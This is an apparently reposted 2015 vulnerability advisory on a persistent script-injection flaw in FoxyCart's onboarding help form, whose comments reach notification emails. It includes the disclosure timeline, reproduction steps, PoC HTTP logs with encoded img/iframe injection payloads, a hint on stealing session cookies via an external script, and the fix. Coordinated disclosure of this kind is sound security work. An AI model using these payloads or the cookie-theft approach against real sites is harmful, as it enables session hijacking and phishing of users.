Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32368
HistoryJul 27, 2015 - 12:00 a.m.

FoxyCart Bug Bounty #1 - Filter Bypass & Persistent Vulnerability

2015-07-2700:00:00
vulners.com
27
JSON

Document Title:

FoxyCart Bug Bounty #1 - Filter Bypass & Persistent Vulnerability

References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1451

098bdc9b309783df65044c5abb690dafdd4bcd436c380ae68c924fe37e14b4e0

Release Date:

2015-07-15

Vulnerability Laboratory ID (VL-ID):

1451

Common Vulnerability Scoring System:

3.4

Product & Service Introduction:

Helping developers add custom ecommerce without reinventing the wheel.

(Copy of the Homepage: https://github.com/FoxyCart )

Abstract Advisory Information:

The Vulnerability Laboratory Core Research Team discovered a filter bypass issue and an application-side input validation vulnerability in the official FoxyCart web-application.

Vulnerability Disclosure Timeline:

2015-03-05: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2015-04-01: Vendor Notification (FoxyCart - Security Research Team)
2015-04-09: Vendor Response/Feedback (FoxyCart - Security Research Team)
2015-06-30: Vendor Fix/Patch ( (FoxyCart - Developer Team)
2015-07-15: Public Disclosure (Vulnerability Laboratory)

Discovery Status:

Published

Affected Product(s):

FoxyCart LLC
Product: FoxyCart - Web Application 2015 Q2

Exploitation Technique:

Remote

Severity Level:

Medium

Technical Details & Description:

A persistent input validation mail encoding vulnerability has been discovered in the official FoxyCart company web-application.
The issue allows remote attackers to inject own malicious web context to the application-side of a vulnerable module or function.

The security vulnerability is located in the `comments` input field value of the `landing/white-glove-onboarding > Help Form` module.
Remote attackers can exploit the issue to execute persistent malicious context in foxycart service mails.

The injection takes place in the help contact form POST method request with the vulnerable comments input value. The execution of the
script code occurs on the application-side in the email body context. Attackers are able to inject iframes, img sources with onload alert
or other script code tags. The service does not encode the input and has also no input restriction.

After the code has been saved during the registration the internal service takes the wrong encoded dbms entries and stream them back in a
notification mail to the registered users inbox. The attacker is also able to include random email adresses to stream mails with malicious
persistent context to random targets for phishing, spam and co. The code does not execute in the profile values that introduces to the
manufacturer itself but in the attached comments value that becomes visible in the copy mail.

The security risk of the persistent input validation web vulnerability in the mail encoding of the web-server is estimated as medium with a cvss
(common vulnerability scoring system) count of 3.4. If the issue is existing in the main service values the other services can be affected by the
issue too. Exploitation of the mail encoding and web-server validation vulnerability requires low or medium user interaction and no privileged
customer application user account. Successful exploitation of the persistent mail encoding web vulnerability results in session hijacking, persistent
phishing attacks, persistent redirects to external malicious source and persistent manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] landing/white-glove-onboarding > Help Form

Vulnerable Parameter(s):
[+] comments

Affected Module(s):
[+] We`ve received your email

Proof of Concept (PoC):

The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce …

  1. Open the foxcart service
  2. Surf to the vulnerable conatct form url
  3. Inject random value to the inputs and inject to the comments your script code payload
  4. Save the entry
  5. Redirect via Refresh Referer to confirm the contact request
  6. Check inbox of the contact mail input
  7. The code executes in the comments body section
  8. Successful reproduce of the vulnerability!

— PoC Session Logs [POST] (Inject) —
13:33:03.031[1210ms][total 1210ms] Status: 302[Found]
POST http://www.foxycart.com/landing/white-glove-onboarding Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gro?e des Inhalts[0] Mime Type[text/html]
Request Header:
Host[www.foxycart.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.foxycart.com/landing/white-glove-onboarding]
Cookie[optimizelySegments=%7B%22234696064%22%3A%22ff%22%2C%22234587425%22%3A%22false%22%2C%22234346863%22%3A%22referral%22%7D; optimizelyEndUserId=oeu1425557285423r0.7588310203460514; optimizelyBuckets=%7B%22630610022%22%3A%22637250003%22%7D; __utma=91412365.670830544.1425557288.1425557288.1425557288.1; __utmb=91412365.49.9.1425557973207; __utmc=91412365; __utmz=91412365.1425557288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wcsid=bVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; hblid=cXd4qSmViFwp1L9N575fV3P3JONRArB8; _oklv=1425558756967%2CbVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; ajs_user_id=%22bkm%40evolution-sec.com%22; ajs_group_id=null; ajs_anonymous_id=%22f9f4d6e9-ba8f-4231-b4e5-fb1e4dd21d01%22; __ar_v4=M2MP7NP4NRDZJKE5JJ255A%3A20150304%3A14%7CMZASOLFIIFHM7D4UXSZSHG%3A20150304%3A14%7CZ5SPRZQMMBAYPLL3Z7BEBR%3A20150304%3A14; kvcd=1425558696901; km_ai=bkm%40evolution-sec.com; km_uq=; km_vs=1; km_lv=1425558697; olfsk=olfsk9501150073115311; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1425557290132%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=2799-934-10-5695; __utmv=91412365.|1=user_type=programmer%20developer%20merchant=1^2=trial=0.1=1; km_ni=bkm%40evolution-sec.com; optimizelyPendingLogEvents=%5B%5D]
Connection[keep-alive]
POST-Daten:
firstName[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
lastName[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
email[bkm%40evolution-sec.com]
phone[235235235]
field-0[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
field-3[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
field-4[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
id[840b20b9386a4e669f20873f092ae257]
Response Header:
Content-Type[text/html]
Expires[Thu, 05 Mar 15 04:34:12 -0800]
Cache-Control[max-age=60]
Vary[Accept-Encoding]
Location[http://www.foxycart.com/landing/white-glove-onboarding?contact=submitted]
Content-Length[0]
Accept-Ranges[bytes]
Date[Thu, 05 Mar 2015 12:33:13 GMT]
Connection[keep-alive]
X-Frame-Options[SAMEORIGIN]

13:33:04.242[1255ms][total 1728ms] Status: 200[OK]
GET http://www.foxycart.com/landing/white-glove-onboarding?contact=submitted Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Gro?e des Inhalts[7726] Mime Type[text/html]
Request Header:
Host[www.foxycart.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.foxycart.com/landing/white-glove-onboarding]
Cookie[optimizelySegments=%7B%22234696064%22%3A%22ff%22%2C%22234587425%22%3A%22false%22%2C%22234346863%22%3A%22referral%22%7D; optimizelyEndUserId=oeu1425557285423r0.7588310203460514; optimizelyBuckets=%7B%22630610022%22%3A%22637250003%22%7D; __utma=91412365.670830544.1425557288.1425557288.1425557288.1; __utmb=91412365.49.9.1425557973207; __utmc=91412365; __utmz=91412365.1425557288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wcsid=bVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; hblid=cXd4qSmViFwp1L9N575fV3P3JONRArB8; _oklv=1425558756967%2CbVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; ajs_user_id=%22bkm%40evolution-sec.com%22; ajs_group_id=null; ajs_anonymous_id=%22f9f4d6e9-ba8f-4231-b4e5-fb1e4dd21d01%22; __ar_v4=M2MP7NP4NRDZJKE5JJ255A%3A20150304%3A14%7CMZASOLFIIFHM7D4UXSZSHG%3A20150304%3A14%7CZ5SPRZQMMBAYPLL3Z7BEBR%3A20150304%3A14; kvcd=1425558696901; km_ai=bkm%40evolution-sec.com; km_uq=; km_vs=1; km_lv=1425558697; olfsk=olfsk9501150073115311; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1425557290132%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=2799-934-10-5695; __utmv=91412365.|1=user_type=programmer%20developer%20merchant=1^2=trial=0.1=1; km_ni=bkm%40evolution-sec.com; optimizelyPendingLogEvents=%5B%5D]
Connection[keep-alive]
Response Header:
Content-Type[text/html]
Expires[Thu, 05 Mar 15 04:34:13 -0800]
Cache-Control[max-age=60]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[7726]
Accept-Ranges[bytes]
Date[Thu, 05 Mar 2015 12:33:14 GMT]
Connection[keep-alive]
X-Frame-Options[SAMEORIGIN]

Note: Inject an img or iframe with an external js source that requests session data by usage of document.cookie to exploit

Reference(s):
http://www.foxycart.com/landing/white-glove-onboarding
http://www.foxycart.com/landing/white-glove-onboarding?contact=submitted

Solution - Fix & Patch:

The vulnerability can be patched by a secure filter mechanism next to the help comment support form.
Restrict the input and encode the output message with the delivered copy.

Security Risk:

The security risk of the filter issue and application-side input validation vulnerability is estimated as medium. (CVSS 3.4)

Credits & Authors:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ([email protected]) [www.vulnerability-lab.com]

Disclaimer & Information:

The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: [email protected] - [email protected] - [email protected]
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
([email protected] or [email protected]) to get a permission.

			Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

– VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: [email protected] PGP KEY: http://www.vulnerability-lab.com/keys/[email protected]%280x198E9928%29.txt

JSON